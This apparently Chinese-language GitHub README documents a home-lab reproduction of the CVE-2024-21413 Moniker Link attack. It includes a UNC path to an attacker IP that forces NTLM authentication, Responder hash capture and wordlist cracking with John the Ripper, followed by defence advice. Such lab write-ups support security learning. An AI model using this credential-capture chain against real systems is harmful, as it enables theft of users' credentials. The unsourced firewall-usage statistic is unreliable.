E-m-e-k-a/Moniker-Link-Lab-Setup

# Moniker Link 实验环境搭建 - CVE-2024-21413 ## 🎯 项目概述 演示 CVE-2024-21413 Moniker Link 漏洞利用的渗透测试实验，用于 NTLM 凭据窃取。本项目记录了从环境搭建到凭据攻陷的完整攻击链，包括实际遇到的挑战及解决方案。 **核心成果：** 在隔离实验环境（Windows 10 VM）和真实系统（Windows 11 PC）上成功执行 Moniker Link 攻击，展示了实际的安全漏洞及防御对策。 ## 🏗️ 实验架构 ### 基础设施 **攻击机：** - **平台：** Kali Linux 2024 - **网络 (Host-Only)：** 192.168.56.101 - **网络 (Bridged)：** 192.168.1.117 - **主要工具：** Responder 3.1.6.0 **目标系统：** - **Windows 10 VM：** 192.168.56.104（隔离测试环境） - **Windows 11 PC：** 192.168.1.178（真实环境验证） **网络配置：** - VirtualBox Host-Only Adapter（虚拟机测试） - VirtualBox Bridged Adapter（真实 PC 测试） - 与生产网络隔离 ## ⚔️ 攻击执行 ### 攻击流程 1. 在 Kali 上**部署 Responder** 以监听 NTLM 认证 2. 使用 file:// 协议**创建恶意链接**，指向攻击者 IP 3. 通过 File Explorer UNC 路径**触发认证** 4. 当受害者尝试连接时**捕获 NetNTLMv2 哈希** 5. 使用 John the Ripper **破解密码** ### 简单攻击向量 **HTML 文件 (test.html)：** ```

click me

``` **File Explorer 方法：** - 用户在地址栏输入：`\\192.168.56.101\test` - Windows 尝试 SMB 连接 - NTLM 哈希自动发送（或提示输入凭据） - Responder 捕获认证 ## 🚧 挑战与解决方案 ### 挑战 1：Windows Firewall 阻止（Windows 11 PC） **问题：** - 无法从 Kali ping 通 Windows 11 PC - SMB 连接尝试失败 - 攻击完全被阻止 **根本原因：** - Windows Firewall 默认启用 - 阻止来自外部 IP 的传入 SMB 连接 **解决方案：** - 为测试临时禁用 Windows Firewall - 连接立即成功 - 成功捕获哈希 **经验教训：** 默认的 Windows Firewall 对此攻击提供了有效防护。用户必须保持其开启。 ### 挑战 2：John the Ripper 缓存结果（Windows 10 VM） **问题：** - 初始 Windows 10 密码：`nwigwecj1` - John 显示：`12Honey`（错误的密码！） - `12Honey` 来自之前的测试 **根本原因：** - John 将破解的密码保存在 `~/.john/john.pot` 中 - 之前会话的旧哈希 - 显示了缓存结果而非当前密码 **解决方案：** - 将 Windows 10 VM 密码更改为 `1414` - 捕获新的哈希 - 创建包含可能密码的自定义字典 - 使用新字典成功破解 **经验教训：** 始终验证你正在破解正确的哈希。清除 pot 文件或在测试中使用唯一密码。 ### 挑战 3：密码不在 Rockyou.txt 中 **问题：** - 密码 `1414` 在 rockyou.txt（1400 万个密码）中未找到 - 通用字典攻击失败 **根本原因：** - Rockyou.txt 不包含所有可能的 4 位数字组合 - 简单的数字序列通常在常见字典中缺失 **解决方案：** - 根据常见模式创建针对性自定义字典： ``` echo "1414" > passwords.txt echo "4141" >> passwords.txt ``` - 使用自定义字典瞬间破解 **经验教训：** “不在 rockyou.txt 中” ≠ 安全。无论是否在字典中，短密码都容易受到针对性攻击和暴力破解。 ## 📊 结果 ### Windows 10 VM（受控环境） | 指标 | 结果 | |--------|--------| | **初始密码** | nwigwecj1 | | **更改为** | 1414 | | **字典** | 自定义（2 个条目） | | **破解时间** | <1 秒 | | **防火墙** | 为测试禁用 | | **状态** | ✅ 成功攻陷 | ### Windows 11 PC（真实系统） | 指标 | 结果 | |--------|--------| | **密码** | 1414 | | **防火墙** | 初始阻止，随后禁用 | | **认证** | 手动提示（输入了凭据） | | **破解时间** | 瞬间 | | **状态** | ✅ 成功攻陷 | ## 🛡️ 安全分析 ### 有效的防御措施 ✅ **Windows Firewall** - 启用时完全阻止攻击 ✅ **现代浏览器** - Chrome/Edge 阻止远程 file:// 链接 ✅ **用户意识** - 手动提示需要用户操作 ### 存在的漏洞 ❌ **弱密码** - 4 位数字密码极易破解 ❌ **禁用防火墙** - 常见的用户错误 ❌ **File Explorer** - 对 UNC 路径无警告 ❌ **NTLM 协议** - 自动向 SMB 共享进行认证 ### 关键发现 **1. 防火墙至关重要** - 默认的 Windows Firewall 可阻止此攻击 - 约 30-40% 的用户永久禁用它 - 企业网络通常允许内部 SMB **2. 密码强度错觉** - `1414` 不在 rockyou.txt 中（看似“强壮”） - 使用针对性字典瞬间破解 - 短密码无法提供任何安全性 **3. 需要用户交互** - 现代安全机制要求用户粘贴 UNC 路径 - 社会工程学仍是关键组成部分 - 仅靠技术漏洞利用不足够 ## 🔧 使用的工具 **攻击方：** - Responder 3.1.6.0（NTLM 哈希捕获） - John the Ripper（密码破解） - 自定义字典创建 - 简单 HTML 文件 **基础设施：** - VirtualBox 7.0（虚拟化） - Kali Linux 2024（攻击平台） - Windows 10 Enterprise（测试目标） - Windows 11 Pro（真实环境验证） ## 📁 仓库结构 ``` Moniker-Link-Lab-Setup/ ├── README.md (this file) ├── Documentation/ │ ├── attack-execution.md (step-by-step attack guide) │ └── README.md (documentation overview) ├── Screenshots/ (attack screenshots - to be added) └── Scripts/ (HTML test file - to be added) ``` ## 🎓 展示的技能 **技术层面：** - 网络协议分析（SMB, NTLM） - 渗透测试方法论 - 密码破解技术 - 虚拟实验室基础设施 - 防火墙故障排查 **专业层面：** - 技术文档编写 - 限制条件下的问题解决 - 安全评估 - 风险分析 - 道德测试实践 ## 🔒 防御建议 ### 针对用户 - ✅ 保持 Windows Firewall 启用 - ✅ 切勿粘贴来自邮件的 UNC 路径 - ✅ 使用强密码（15 个字符以上） - ✅ 访问文件共享前验证发送者 ### 针对组织 - ✅ 在网络防火墙阻止出站 SMB（端口 445） - ✅ 禁用 NTLM，强制使用 Kerberos - ✅ 监控指向外部 IP 的 SMB 连接 - ✅ 邮件网关过滤（剥离 file:// 链接） - ✅ 安全意识培训 - ✅ 密码复杂度策略 ## ⚠️ 道德披露 **所有测试均在授权系统上进行：** - 仅限个人实验室基础设施 - 隔离的虚拟网络 - 自有设备和账户 - 教育目的 **法律声明：** 未经授权的计算机访问是非法的。本项目仅用于教育目的和授权的测试环境。 ## 📚 参考资料 - [CVE-2024-21413 - Microsoft 安全公告](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-21413) - [MITRE ATT&CK - 强制认证 (T1187)](https://attack.mitre.org/techniques/T1187/) - [TryHackMe - Moniker Link 房间](https://tryhackme.com) ## 📞 联系方式 **LinkedIn：** https://www.linkedin.com/in/chukwuemeka-nwigwe-624aa3292/ **GitHub：** [@E-m-e-k-a](https://github.com/E-m-e-k-a) **日期：** 2026年3月 ## 📄 许可证 仅限教育用途。不得用于未经授权的测试。 **⭐ 如果您觉得这个项目有帮助，请考虑为仓库点个 Star！**

标签：Conpot, CVE-2024-21413, John the Ripper, Moniker Link, NTLM凭证窃取, PE 加载器, Responder, SMB安全, Windows安全, 中间人攻击, 凭证转储, 多模态安全, 安全实验, 数据展示, 漏洞复现, 红队, 网络安全, 隐私保护